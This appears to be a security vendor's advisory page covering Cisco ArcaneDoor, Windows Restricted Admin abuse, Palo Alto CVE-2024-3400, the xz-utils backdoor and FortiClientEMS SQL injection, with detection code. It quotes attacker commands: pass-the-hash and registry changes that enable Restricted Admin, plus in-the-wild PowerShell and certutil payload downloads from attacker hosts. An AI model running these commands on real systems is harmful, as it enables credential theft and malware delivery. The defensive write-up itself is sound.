    On April 24th, 2024, Cisco disclosed that a state-sponsored hacking group, dubbed "ArcaneDoor," has been actively exploiting three zero-day vulnerabilities in Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023. The group has been targeting government networks worldwide, focusing on espionage and gaining in-depth knowledge of the compromised devices. While the attack vector used to provide attackers initial access remains unknown, Cisco has provided details on the specific vulnerabilities used during the hacking group’s campaign.

    How Bad is This?

    The ArcaneDoor hacking group has been observed exploiting three zero-day vulnerabilities, CVE-2024-20353, CVE-2024-20358, and CVE-2024-20359 in Cisco ASA and FTD firewalls. They used these vulnerabilities in conjunction with two custom-built tools, "Line Dancer" and "Line Runner," to gain unauthorized access, disable logging, exfiltrate captured packets, and execute arbitrary code on the compromised devices.

    The group's primary objectives appear to be espionage and gaining in-depth knowledge of the targeted devices. They exfiltrated device configuration files, disabled syslog services to cover their tracks, and modified AAA configurations to allow their own devices access to the network.

    Severity of the CVEs:

    1. CVE-2024-20353 (HIGH): This vulnerability in the management and VPN web servers could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.
    2. CVE-2024-20359 (HIGH): This vulnerability allows for executing arbitrary code with root-level privileges. The injected code could potentially persist across device reboots, elevating the severity of this vulnerability.
    3. CVE-2024-20358 (MEDIUM): Similar to CVE-2024-20359, this vulnerability allows for executing arbitrary code with root-level privileges but is unable to persist through reboots.

    What Should I Do?

    To mitigate the risk posed by these vulnerabilities, administrators should take the following actions:

    1. Patch affected devices as soon as possible. Cisco has released software updates that address these vulnerabilities.
    2. Configure logging to a central, secure location to detect and monitor any suspicious activities.
    3. Implement Multi-Factor Authentication (MFA) to prevent unauthorized access.
    4. Monitor systems for unscheduled reboots, unauthorized configuration changes, and suspicious credential activity.
    5. Verify the integrity of ASA and FTD devices using the instructions provided by Cisco in their official advisory.

    The ArcaneDoor hacking group's exploitation of zero-day vulnerabilities in Cisco ASA and FTD firewalls highlights the importance of timely patching and maintaining a robust security posture. Administrators should prioritize patching affected devices, implement secure logging and monitoring practices, and follow Cisco's guidance to ensure the integrity of their networks.

    For additional information refer to these resources:

    How Blumira Can Help

    Blumira continues to actively monitor this issue and to look for ways that we can detect any stage of exploitation of these vulnerabilities.

    If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Low
    April 19, 2024

    Why are Threat Actors enabling Windows Restricted Admin mode?

    RestrictedAdmin mode for RDP was first introduced in Windows 8.1 and Windows Server 2012 R2. Restricted Admin mode was later backported to Windows 7 and Windows Server 2008; however, it was subsequently disabled by default on newer Windows systems.

    Microsoft Security

    RestrictedAdmin mode for RDP was first introduced in Windows 8.1 and Windows Server 2012 R2. Restricted Admin mode was later backported to Windows 7 and Windows Server 2008; however, it was subsequently disabled by default on newer Windows systems. While Restricted Admin mode was created to help protect administrative account credentials against Pass-the-Hash attacks, ironically, the security control resulted in a new Pass-the-Hash vector.


    The intention behind Restricted Admin mode was to mitigate the risk of exposing administrative credentials when connecting to potentially compromised machines. Normally, when you log on via RDP using an interactive session (username and password), a copy of your credentials is stored in the Local Security Authority Subsystem Service (LSASS) on the destination host.


    When Restricted Admin mode is enabled, the RDP server uses a network logon instead of an interactive logon. This means a user with local administrator privileges on a system with Restricted Admin mode enabled authenticates with an NT hash or Kerberos ticket instead of a password. While the password itself is not cached, these NT hashes are, and they can be collected and used to impersonate users.

    Restricted Admin Mode Adversarial Techniques

    Because Restricted Admin mode is typically disabled by default, threat actors have been observed enabling it in order to dump hashed user credentials stored in memory. Restricted Admin mode may also be enabled in order to bypass MFA solutions for RDP. [7] [2]


    Once a threat actor has access to a compromised endpoint, hashed credentials can be trivially extracted from the Security Account Manager (SAM) registry hive or dumped from LSASS using open-source offensive security tools. For instance, hashes can be dumped from an open session to a compromised host using the hashdump command in the Meterpreter tool:

    or dump NT hashes from LSASS by using mimikatz:

    After the hash is collected, the NT hash of an account in an administrative group can be used to move laterally or issue commands remotely. For example, a threat actor could use xfreerdp [9]:

    xfreerdp /v:IP_ADDRESS /u:USERNAME /pth:NT_HASH

    or mimikatz to perform a pass-the-hash attack to move laterally via RDP using a host with Restricted Admin mode enabled. [6]

    Here are a few examples of recent intrusions where an attacker enabled Restricted Admin mode by setting the DisableRestrictedAdmin registry value to 0. The DFIR Report published a write-up on an intrusion from February 2023 that weaponized Restricted Admin mode. [3]

    reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0

    CISA has published multiple cybersecurity advisories reporting Restricted Admin mode being weaponized in the same way. These include the Russian Foreign Intelligence Service (SVR) in December 2023 [4] and multiple nation-state threat actors in September 2023 [5].

    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
    powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

    Defensive Security Controls and Blumira Detection

    Restricted Admin mode is generally not recommended for most workstations and is disabled by default. However, there are specific circumstances in which Microsoft does recommend enabling Restricted Admin mode, such as certain helpdesk support scenarios:

    For helpdesk support scenarios in which personnel require administrative access via Remote Desktop sessions, the use of Remote Credential Guard isn't recommended. If an RDP session is initiated to an already compromised client, the attacker could use that open channel to create sessions on the user's behalf. The attacker can access any of the user's resources for a limited time after the session disconnects.

    We recommend using the Restricted Admin mode option instead. For helpdesk support scenarios, RDP connections should only be initiated using the /RestrictedAdmin switch. This helps to ensure that credentials and other user resources aren't exposed to compromised remote hosts.

    (Source: Microsoft, updated 03/12/2024)[13]

    If you’d like to learn more about Restricted Admin best use cases and compare it to other Microsoft features, check out the documentation from Microsoft linked here: Remote Credential Guard | Compare Remote Credential Guard with other connection options. RestrictedAdmin mode is available for the following systems: “Windows 7, Windows 8, Windows 8.1, Windows 10, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows RT“. [8]

    Blumira detects the adversarial techniques reported by CISA and The DFIR Report with a "Registry Value Tampering: Restricted Admin Mode Enabled" detection. Blumira detections also monitor for related threat actor activities that may occur before or after this activity, such as discovery, credential access, persistence, and exploit execution. Some of these detections include:

    • Nltest Domain Enumeration
    • Mimikatz Pass the Hash
    • Password Dumper Remote Thread in LSASS
    • COMSPEC Service Execution
    • User Added to Local Administrator Group
    • and more…
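    The registry-tampering detection described above, as an added example that is not Blumira's own rule logic: it recognises DisableRestrictedAdmin being set to 0 both in the reg.exe and PowerShell command lines quoted earlier (process-creation events) and in a Sysmon Event ID 13 registry value-set event, normalising the HKLM / HKEY_LOCAL_MACHINE / HKLM: spellings so one rule covers all three. The sample events are constructed; setting the value back to 1 or touching another Lsa value must not alert.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Registry location that controls Restricted Admin mode (path and value name as
# shown in the commands above). 0 enables the mode; 1 disables it.
LSA_KEY = "hklm\\system\\currentcontrolset\\control\\lsa"
VALUE_NAME = "disablerestrictedadmin"

# Spellings of the machine hive seen in reg.exe and PowerShell command lines.
_HIVES = {"hkey_local_machine": "hklm", "hklm": "hklm"}


@dataclass
class Alert:
    source: str    # "registry_event" or "command_line"
    evidence: str  # the raw event text that triggered the alert


def normalize_key(path: str) -> str:
    """Canonicalize a registry key: unify the hive spelling (HKLM, HKEY_LOCAL_MACHINE,
    PowerShell's HKLM:), drop quotes and trailing separators, lower-case the rest."""
    path = path.strip().strip('"').strip("'").replace("/", "\\").rstrip("\\")
    hive, _, rest = path.partition("\\")
    hive = _HIVES.get(hive.lower().rstrip(":"), hive.lower())
    return f"{hive}\\{rest.lower()}"


def dword_value(data: str) -> Optional[int]:
    """Parse DWORD data as reg.exe ("0"), PowerShell ("0") or Sysmon ("DWORD (0x00000000)")
    render it. Returns None when no numeric token is present."""
    m = re.search(r"0x[0-9a-fA-F]+|\d+", data)
    if not m:
        return None
    tok = m.group(0)
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)


def check_registry_event(target_object: str, details: str) -> Optional[Alert]:
    """Sysmon Event ID 13 (RegistryEvent, value set): TargetObject carries the full
    path including the value name, Details carries the new data."""
    key, _, name = normalize_key(target_object).rpartition("\\")
    if key == LSA_KEY and name == VALUE_NAME and dword_value(details) == 0:
        return Alert("registry_event", f"{target_object} = {details}")
    return None


# One argument: a double-quoted, single-quoted or bare token.
_ARG = r"(\"[^\"]*\"|'[^']*'|\S+)"
_REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\s+" + _ARG, re.I)
_REG_NAME = re.compile(r"/v\s+" + _ARG, re.I)
_REG_DATA = re.compile(r"/d\s+" + _ARG, re.I)
_PS_CMDLET = re.compile(r"\b(?:New|Set)-ItemProperty\b", re.I)
_PS_PATH = re.compile(r"-Path\s+" + _ARG, re.I)
_PS_NAME = re.compile(r"-Name\s+" + _ARG, re.I)
_PS_VALUE = re.compile(r"-Value\s+" + _ARG, re.I)


def _first(pattern: "re.Pattern", text: str) -> Optional[str]:
    m = pattern.search(text)
    return m.group(1).strip("\"'") if m else None


def check_command_line(cmdline: str) -> Optional[Alert]:
    """Process-creation command line (Sysmon Event ID 1 / Security 4688): recognise
    the reg.exe and PowerShell forms of writing DisableRestrictedAdmin = 0."""
    if _REG_ADD.search(cmdline):
        key, name, data = (_first(_REG_ADD, cmdline), _first(_REG_NAME, cmdline),
                           _first(_REG_DATA, cmdline))
    elif _PS_CMDLET.search(cmdline):
        key, name, data = (_first(_PS_PATH, cmdline), _first(_PS_NAME, cmdline),
                           _first(_PS_VALUE, cmdline))
    else:
        return None
    if key is None or name is None or data is None:
        return None
    if (normalize_key(key) == LSA_KEY and name.lower() == VALUE_NAME
            and dword_value(data) == 0):
        return Alert("command_line", cmdline)
    return None


def scan(events: Iterable[Dict[str, str]]) -> List[Alert]:
    """Run both checks over events shaped like the constructed SAMPLE_EVENTS below."""
    alerts: List[Alert] = []
    for ev in events:
        if "TargetObject" in ev:
            hit = check_registry_event(ev["TargetObject"], ev.get("Details", ""))
        else:
            hit = check_command_line(ev.get("CommandLine", ""))
        if hit:
            alerts.append(hit)
    return alerts


# Constructed sample events: the three command lines quoted above, one Sysmon
# registry event, and two benign events that must not alert.
SAMPLE_EVENTS = [
    {"CommandLine": 'reg add "hklm\\system\\currentcontrolset\\control\\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0'},
    {"CommandLine": 'reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f'},
    {"CommandLine": 'powershell New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force'},
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin", "Details": "DWORD (0x00000000)"},
    # Re-hardening (value set back to 1) and an unrelated Lsa value: no alert.
    {"CommandLine": 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f'},
    {"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RunAsPPL", "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.source}] Restricted Admin mode enabled: {a.evidence}")
```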

    REFERENCES

    [1] https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)#restricted-admin-mode-for-remote-desktop-connection
    [2] https://duo.com/docs/rdp-faq#what-logon-interfaces-can-duo-protect?
    [3] https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/
    [4] https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
    [5] https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a
    [6] https://hunter2.gitbook.io/darthsidious/getting-started/intro-to-windows-hashes
    [7] https://www.aon.com/cyber-solutions/aon_cyber_labs/restricted-admin-mode-circumventing-mfa-on-rdp-logons/
    [8] https://learn.microsoft.com/en-us/archive/technet-wiki/32905.remote-desktop-services-enable-restricted-admin-mode
    [9] https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/

    Critical
    April 12, 2024

    CVE-2024-3400: Palo Alto Vulnerabilities in GlobalProtect Gateway Lead to RCE

    On Friday (4-12-24), Palo Alto announced a new critical vulnerability in devices running their GlobalProtect Gateway. 

    What Happened?

    On Friday (4-12-24), Palo Alto announced a new critical vulnerability in devices running their GlobalProtect Gateway. Successful exploitation of this vulnerability leads to command injection and allows an attacker to run arbitrary code as root on the device.

    Palo Alto disclosed that they are aware of a “limited number of attacks” using this vulnerability (CVE-2024-3400) in the wild. However, since this is a publicly facing service, it’s more than likely that attackers will begin to increasingly leverage this vulnerability.

    Impacted Versions, Available Patches, and Workarounds

    Impacted versions of PAN-OS for CVE-2024-3400 include the following:

    • PAN-OS 10.2 (earlier than 10.2.9)
    • PAN-OS 11.0 (earlier than 11.0.4)
    • PAN-OS 11.1 (earlier than 11.1.2)

    Palo Alto expects to release patches for these versions by 4-14-24.

    To be exposed to this vulnerability, devices on the affected versions also need to have configurations that enable GlobalProtect Gateway and device telemetry.

    Palo Alto’s recommendation for customers subscribed to Palo Alto’s Threat Prevention service is to enable Threat ID 95187. Alternatively, Palo Alto customers can temporarily disable device telemetry until a patch is available.

    If you are not running GlobalProtect Gateway, then no action is needed.

    How Bad Is This?

    HIGH RISK

    This vulnerability results in remote code execution (RCE). RCE-based exploits are among the highest in criticality because an attacker can gain full access (root in this case). Although the vulnerability depends on a pair of services being enabled on the device, it is still serious enough to earn a rare CVSS score of 10. As stated above, Palo Alto is aware of a limited number of cases in which this is being exploited already.

    How Blumira Can Help

    At the time of writing, there are no technical details available about the nature of the attacks or what indicators of compromise exist. When those details emerge, we’ll begin the process of creating detections and reports. We’ll also update this article as more information becomes available.

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.

    Update 1: 4-12-24

    Early indicators of compromise have surfaced from Volexity, the team that reported the vulnerability to Palo Alto; they can be found here and comprise IPs and hashes seen in the recent attacks mentioned above. While IPs and hashes change quite quickly as attackers modify their tactics to avoid detection, we can use the IP listing to search for traffic to and from these IPs. Blumira now has two saved reports that can aid in your investigations:

    • Palo Alto: Allowed Inbound Traffic From IPs Associated With CVE-2024-3400
    • Palo Alto: Allowed Outbound Traffic From IPs Associated With CVE-2024-3400

    Update 2: 4-15-24

    Palo Alto has updated their post to indicate that the first round of hotfixes is out to address this issue. They have also announced that the more commonly used “maintenance” versions will receive a hotfix in the coming days. According to Palo Alto’s Unit 42 post, the saved reports mentioned in the prior update remain valid for finding potential indicators of compromise. We’ll update the search parameters of the reports as more details surface.

    Critical
    April 3, 2024

    CVE-2024-3094: xz-utils (liblzma) Backdoor

    We will continue to provide updates as more information becomes available.
    Update - 2024-04-03 12:15 ET: Added information around Jia Tan persona theories.
    Update - 2024-04-19 17:25 ET: Updated GitHub information; exploit trigger on specific private key.

    This article is divided into two sections: an Executive Summary and Technical Details. The Executive Summary provides a high-level overview of the CVE (Common Vulnerabilities and Exposures) and recommends immediate actions to take. For practitioners seeking more in-depth, low-level context, the Technical Details section offers additional information.


    Executive Summary

    What Happened?

    The xz-utils package, versions 5.6.0 and 5.6.1, has been identified as containing a backdoor in a compromised library dependency, liblzma5. The presence of the backdoor potentially allows unauthorized access to affected systems through the manipulation of the sshd authentication process. This issue has been assigned CVE-2024-3094 and given a CVSS severity score of 10.0 Critical.

    "Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library."

    Source: NIST

    How Bad is This?

    xz-utils is an XZ-format compression utility widely used across Linux distributions. The vulnerability could have posed a major threat, especially to Debian- and Red Hat-based Linux distributions. Fortunately, the backdoor was identified and reported by software engineer Andres Freund shortly after it was introduced into a small number of bleeding-edge Linux distributions, limiting the potential impact.

    While the impact was limited, affected systems are at critical risk. The vulnerability may allow a threat actor to compromise a system by sending a maliciously crafted payload to the SSH daemon (sshd). This payload could potentially grant unauthorized access to the targeted system.

    The following versions of xz-utils are impacted:

    • 5.6.0
    • 5.6.1

    The following Linux distributions are affected:

    The following stable Linux distributions have reported they are not affected:

    *Note: Blumira Sensors are not affected.

    What Should I Do?

    System administrators are advised to immediately patch affected systems to mitigate this security risk, prioritizing those systems with publicly accessible SSH. The xz-utils 5.6.0 and 5.6.1 packages are considered untrustworthy. It is recommended to promptly apply package manager updates across all Linux and macOS systems to upgrade to trusted versions of xz-utils (i.e., versions before 5.6.0).

    If you are using any affected systems in production, be sure to consult the guidance provided by the respective Linux Distribution. Continue to monitor impacted systems for unusual SSH activity.

    System administrators can check the current version of xz-utils using the following command, shared by @Kostastsale on Twitter:

    for xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings "$xz_p" | grep "xz (XZ Utils)" || echo "No match found for $xz_p"; done

    Technical Details

    On Friday, March 29th, 2024, Andres Freund sent an email to the open-source security (oss-security) mailing list to share with open-source projects, distributors, researchers, and developers that he had found a backdoor in the liblzma library included in the xz-utils tarball used by his Debian sid systems. He discovered the backdoor after noticing SSH logins were using more CPU and generating valgrind errors. Freund also shared the email via Mastodon Social.

    Freund first reported the issue to Debian's security team. They then reported the issue to the operating system distribution security contacts list (distros@) used by the oss-security mailing list. CISA was notified by one of the distributions. Red Hat later assigned the issue CVE-2024-3094. Finally the vulnerability was shared with the open-source security mailing list.

    You can read more about the oss-security Mailing List Charter here. The list of the Linux distros included in the distros@ mailing group can be reviewed here.

    Freund describes that one portion of the backdoor is in the distributed tarball for xz-utils versions 5.6.0 and 5.6.1. He points to a line of code in the xz-utils Debian unstable branch that injects an obfuscated script to be executed at the end of the xz-utils configure step. If the preconditions are met, the script modifies the liblzma makefile to insert the backdoor code.

    The compromised files that contain most of the exploit are located at the following paths:

    tests/files/bad-3-corrupt_lzma2.xz
    tests/files/good-large_compressed.lzma

    Freund writes that these files were initially added in 5.6.0 but are not actually used in any tests. He goes on to point out that the injected code caused valgrind errors (valgrind is a debugging and profiling tool suite) and crashes in some configurations. Additional commits are seen in xz-utils version 5.6.1 that attempt to work around these errors, including adjusted exploit code.

    Freund goes on to explain that logins with ssh became a lot slower once liblzma was backdoored. He references before and after timings: a login that previously took 0.299 seconds now took 0.807 seconds. He writes, "openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma." From this we can better understand how the compromised liblzma library can result in unauthenticated access to a system via the sshd daemon.

    Finally, Freund describes their analysis of the compromised code in granular detail. Ultimately, the malicious code modified ifunc resolvers that are resolved during startup resulting in a modified sshd authentication process. The login slowdown is attributed to symbols being parsed in memory, notably liblzma's symbols being parsed before the main sshd binary. Another notable characteristic is the injected code appears to wait for the RSA_public_decrypt symbol in order to modify it so that it redirects to the backdoor code.

    Freund confirms that when he attempted to log in with a public key, he observed the exploit code execute and then normal authentication processes resume. Freund hypothesizes, "I have not yet analyzed precisely what is being checked for in the injected code, to allow unauthorized access. Since this is running in a pre-authentication context, it seems likely to allow some form of access or other form of remote code execution." He then urges that any vulnerable systems be upgraded immediately.

    Brief History on Git Commits and Lobbying for Distribution

    We should avoid speculation on the open-source maintainers involved in the project. Open-source contributors generously provide libraries that are widely used in software and operating systems, often without compensation. Their work is altruistic, built on collaboration, and countless hours of dedication. To pass judgement against open-source contributors is not an effective use of our time and will do little to secure our systems. Law enforcement is better equipped to identify and hold accountable those responsible for any malicious actions.

    This all being said, examining the facts around how a popular open-source utility got backdoored and very nearly made its way into major Linux distributions serves as a valuable cautionary tale. By understanding the details of this incident, we can better protect against future supply-chain attacks targeting open-source code and the critical infrastructure that relies upon it.

    The backdoored xz-utils tarballs were signed by Jia Tan (JiaT75). JiaT75 is also the author of the exploit code introduced in 5.6.0 and updated in 5.6.1. There is growing speculation that Jia Tan could be a persona used by a group of people, potentially a nation-state sponsored team.

    Timeline Overview

    From 2005 to 2008, Lasse Collin, along with a small group of developers, worked to create the XZ file format, which uses the LZMA compression algorithm. Over time the format became popular and is used to efficiently compress things like tar files and Linux kernel images.

    2021-10-29: JiaT75 sends their first patch to the xz-devel mailing list.

    2022-05-19: Lasse Collin responds to an email complaint, apologizing for slow response times and sharing that he may be handing off responsibilities to Jia Tan in an effort to better support xz-utils maintenance and response times.

    2022-11-30: Jia Tan is officially identified by Lasse Collin as an xz-utils maintainer.

    2023-06-22: The hook used by the backdoor is introduced by user Hans Jansen. It is speculated that this account is not a real user because the account returns later to promote the backdoored xz-utils versions and otherwise does not exist on the internet.

    2023-07-07: A suspicious commit is made by JiaT75 to a popular fuzzing library oss-fuzz to disable ifunc support that would help prevent the exploit from being discovered.

    2024-02-23: JiaT75 merges the backdoor code inside "test" files.

    2024-02-24: xz-utils v5.6.0 is released.

    2024-02-26: xz-utils v5.6.0 is added to Debian unstable.

    2024-03-08: JiaT75 commits updates to the exploit to fix valgrind errors showing up in unstable Debian and beta Red Hat distributions.

    2024-03-09: JiaT75 publishes xz-utils v5.6.1.

    2024-03-24: JiaT75 removes details around vulnerability reporting from the SECURITY.md file, which researchers typically rely on for guidance on reporting vulnerabilities.

    2024-03-25: Hans Jansen returns to advocate for an xz-utils update to v5.6.1 in Debian.

    2024-03-28: JiaT75 advocates for an xz-utils update to v5.6.1 in Ubuntu.

    2024-03-29: Andres Freund discloses the vulnerability to Debian and the oss-security distros@ distribution list at Openwall. Red Hat issues CVE-2024-3094.

    Response from xz-utils maintainer

    In response to CVE-2024-3094, GitHub has disabled the xz-utils repository. The GitHub accounts for Jia Tan (JiaT75) and Lasse Collin (Larhzu)* have been suspended, as reported by Lasse Collin in a post on The Tukaani Project site last updated at 2024-04-02 21:44:17 +0300.

    * UPDATE - 2024-04-19: Lasse Collin's GitHub account and the GitHub page for xz have been reinstated.

    Lasse Collin, who has maintained xz-utils since around 2009, shared that he plans to write an article on how the backdoor got into the releases and what can be learned from the situation. You can read more updates from Collin in the post linked here.

    Response from the Security Community

    It is still early days into a complex vulnerability that made its way to bleeding-edge Linux distributions. The security community is continuing to analyze the backdoor. We can expect additional details to become available in the coming weeks. As major details are discovered this article will be updated accordingly.

    UPDATE - 2024-04-19: To trigger the backdoor, a specific private key must be used to authenticate to an sshd that has been compromised by the backdoored liblzma library.

    So far researchers have reported that successful exploitation does not generate any log entries (reported here and here). Consequently, the public detections made available for this vulnerability so far take a vulnerability-management approach: they identify the liblzma library versions 5.6.0 and 5.6.1 being loaded by sshd. This does not detect successful exploitation, but rather identifies an asset that is vulnerable to CVE-2024-3094.
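    The vulnerability-management check described above (is the running sshd using liblzma 5.6.0 or 5.6.1?), as an added example that is not part of the original article or of any of the public detections it refers to: it reads a /proc/<pid>/maps excerpt for the sshd process rather than the on-disk package, so it also catches the case where the package has been upgraded but the daemon still maps the old library (the "(deleted)" suffix the kernel adds), and it parses the "xz (XZ Utils) X.Y.Z" banner that the one-liner above greps for. The maps excerpts are constructed sample data.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

Version = Tuple[int, ...]

# Releases that ship the backdoor (from the advisory above).
AFFECTED = {(5, 6, 0), (5, 6, 1)}

# /proc/<pid>/maps: address range, perms, offset, dev, inode, then the pathname.
_MAPS_LINE = re.compile(r"^[0-9a-f]+-[0-9a-f]+\s+\S+\s+\S+\s+\S+\s+\d+\s+(\S.*)$")
_SONAME_VERSION = re.compile(r"liblzma\.so\.(\d+(?:\.\d+)*)$")
# The banner the page's one-liner greps for in the xz binary.
_XZ_BANNER = re.compile(r"xz \(XZ Utils\) (\d+\.\d+\.\d+)")


def parse_version(text: str) -> Version:
    return tuple(int(p) for p in text.split("."))


@dataclass
class LibMapping:
    path: str
    version: Optional[Version]  # None when the filename carries only the major version
    deleted: bool               # file replaced on disk while still mapped by the process


def liblzma_mappings(maps_text: str) -> List[LibMapping]:
    """Collect the distinct liblzma objects mapped into a process from its /proc/<pid>/maps."""
    seen, out = set(), []
    for line in maps_text.splitlines():
        m = _MAPS_LINE.match(line.strip())
        if not m:
            continue  # anonymous mapping or unparseable line
        path = m.group(1)
        deleted = path.endswith(" (deleted)")
        if deleted:
            path = path[: -len(" (deleted)")]
        if "liblzma.so" not in path or path in seen:
            continue
        seen.add(path)
        ver = _SONAME_VERSION.search(path)
        version = parse_version(ver.group(1)) if ver else None
        if version is not None and len(version) < 3:
            version = None  # e.g. liblzma.so.5: the soname alone does not tell the release
        out.append(LibMapping(path, version, deleted))
    return out


def classify(version: Optional[Version]) -> str:
    if version is None:
        return "unknown"
    return "vulnerable" if version in AFFECTED else "not_affected"


def assess_sshd(maps_text: str) -> List[Tuple[str, str]]:
    """Return (path, verdict) for every liblzma mapped into sshd. A stale mapping means
    the library was replaced on disk but the daemon still runs the old code, so the
    on-disk package version says nothing until sshd is restarted."""
    results = []
    for lib in liblzma_mappings(maps_text):
        verdict = classify(lib.version)
        if lib.deleted:
            verdict += " (stale mapping; restart sshd)"
        results.append((lib.path, verdict))
    return results


def version_from_xz_banner(strings_output: str) -> Optional[Version]:
    """Parse 'xz (XZ Utils) X.Y.Z' as found by `strings` on the xz binary (see the command above)."""
    m = _XZ_BANNER.search(strings_output)
    return parse_version(m.group(1)) if m else None


# Constructed /proc/<pid>/maps excerpts: an sshd still mapping backdoored 5.6.1 that has
# since been replaced on disk, a process whose soname carries only the major version,
# and a patched one.
SAMPLE_MAPS_STALE = """\
7f1c3a200000-7f1c3a204000 r--p 00000000 fd:01 131072 /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 (deleted)
7f1c3a204000-7f1c3a224000 r-xp 00004000 fd:01 131072 /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 (deleted)
7f1c3a300000-7f1c3a3b0000 r-xp 00000000 fd:01 131100 /usr/lib/x86_64-linux-gnu/libsystemd.so.0.38.0
7f1c3a400000-7f1c3a41a000 r-xp 00000000 fd:01 131200 /usr/sbin/sshd
7f1c3a500000-7f1c3a521000 rw-p 00000000 00:00 0
"""
SAMPLE_MAPS_UNKNOWN = "7f00a0000000-7f00a0030000 r-xp 00000000 fd:01 4242 /usr/lib64/liblzma.so.5\n"
SAMPLE_MAPS_PATCHED = "7f00b0000000-7f00b0030000 r-xp 00000000 fd:01 4343 /usr/lib/x86_64-linux-gnu/liblzma.so.5.4.5\n"

if __name__ == "__main__":
    for label, text in (("stale", SAMPLE_MAPS_STALE), ("unknown", SAMPLE_MAPS_UNKNOWN),
                        ("patched", SAMPLE_MAPS_PATCHED)):
        print(label, assess_sshd(text))
    print("xz banner:", version_from_xz_banner("xz (XZ Utils) 5.6.1\nliblzma 5.6.1"))
```

On a live host the maps text would come from /proc/$(pidof sshd)/maps, which needs root to read for a root-owned daemon.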

    Security researchers are asking themselves if there are other libraries that may have or could be compromised in a similar manner, and if that were to happen how could one identify them.

    If you'd like to read more about this vulnerability in greater detail, check out the following blog posts and articles around CVE-2024-3094:

    Recreating the Vulnerability in a Test Environment

    The following guides, tools, and repositories are available if you'd like to explore the CVE in a lab setting:

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.

    Critical
    March 22, 2024

    CVE-2023-48788: FortiClientEMS SQL Injection Flaw

    Update 4.1.24 - Blumira has observed active exploitation of this vulnerability in the wild. The following indicators have been observed spawning from the sqlserver.exe process.

    Finger.exe: "C:\Windows\system32\cmd.exe" /c FINGER ADMIN@185.56.83[.]82

    PowerShell: "C:\Windows\system32\cmd.exe" /c powershell -nop -c $ds = 'D' + 'Own' + 'LOa'' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest', 'c:\windows\temp\m.msi')

    Certutil: certutil -f -urlcache https://ursketz[.]com/bin/bander.msi c:\windows\temp\x.msi

    The following default-enabled Blumira detections will trigger if any of these activities are observed in your environment:

    • Suspicious Invocation of Finger.exe
    • MSSQL XP_CMDSHELL Usage
    • Certutil Download

    Indicators of Compromise

    • 185.56.83[.]82
    • 95.179.241[.]10
    • ursketz[.]com

    What Happened?

    Fortinet disclosed a critical vulnerability (FG-IR-24-007) on March 12, 2024, which has been identified in the FortiClient Enterprise Management Server (FortiClientEMS). FortiClientEMS is a product designed for centralized management of endpoints within an organization's network, offering a broad suite of security and management features. This is an SQL injection flaw that could allow an unauthenticated, remote attacker to execute arbitrary code through specially crafted requests.

    How Bad is This?

    RISK rating is Very High.

    SQL injection is a common attack vector that exploits vulnerabilities in an application's software coding to manipulate backend databases. It allows attackers to insert or "inject" malicious SQL queries into input fields, which can then be executed by the database.

    This specific vulnerability allows an unauthenticated, remote attacker to perform SQL injection attacks against the DAS (Database Access Service) component of FortiClientEMS. This SQL injection allows the attacker to execute remote commands using the deprecated, built-in xp_cmdshell function in MSSQL. Even when disabled, xp_cmdshell is trivial to re-enable with the right SQL commands, so its use should be carefully monitored. The exploitation of such a vulnerability could allow attackers to bypass authentication mechanisms, retrieve or alter sensitive data from the database, and potentially compromise the entire system or network by escalating privileges or deploying further malicious payloads.
